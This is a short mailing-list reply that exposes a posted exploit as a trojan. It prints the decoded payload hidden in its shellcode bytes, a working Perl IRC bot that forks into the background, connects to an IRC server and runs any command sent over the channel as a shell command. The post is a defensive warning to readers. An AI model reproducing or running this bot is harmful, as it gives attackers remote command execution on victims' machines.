Excellent exploit, I'm sure no one will spot that perl IRC bot in there, nope no one will see that... (hint for the readers, try looking at the ascii out put of the "char *shellcode_payload=" data, looks a little like the following....) [code] #!/usr/bin/perl $c han="#0x";$nick="k ";$server="ir3ip.n et";$SIG{TERM}={}; exit if fork;use I O::Socket;$sock = IO::Socket::INET-> new($server.":6667 ")||exit;print $so ck "USER k +i k :k v1\nNICK k\n";$i=1 ;while(<$sock>=~/^ [^ ]+ ([^ ]+) /){$ mode=$1;last if $m ode=="001";if($mod e=="433"){$i++;$ni ck=~s/\d*$/$i/;pri nt $sock "NICK $ni ck\n";}}print $soc k "JOIN $chan\nPRI VMSG $chan :Hi\n"; while(<$sock>){if (/^PING (.*)$/){pr int $sock "PONG $1 \nJOIN $chan\n";}i f(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\ w]*:[^ :\w]* (.*)$ /$1/){s/\s*$//;$_= `$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$ _\n";sleep 1;}}}#/ tmp/hi [/code] -- Barrie Dempster (zeedo) - Fortiter et Strenue http://www.bsrf.org.uk [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
Description: This is a digitally signed message part